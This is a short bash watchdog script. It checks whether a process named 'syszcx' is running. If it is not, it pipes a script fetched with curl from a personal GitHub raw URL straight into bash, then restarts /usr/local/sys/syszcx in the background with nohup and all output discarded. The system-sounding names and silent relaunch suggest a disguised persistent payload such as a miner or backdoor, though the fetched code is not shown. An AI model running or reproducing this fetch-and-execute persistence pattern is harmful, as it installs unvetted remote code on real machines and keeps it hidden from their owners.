#!/bin/bash

function count_process()
{
    ps -ef |grep $1 |grep -v "grep" |wc -l
}

if [ $(count_process syszcx) -eq 0 ]
then
  echo 'syszcx was outed'
    if [ ! -f syszcx ];then
	bash < <(curl  -Ls https://raw.githubusercontent.com/hankhu666/sys/main/musys)
    fi
  nohup bash /usr/local/sys/syszcx &>/dev/null & 
  echo 'syszcx has been started just now'
fi

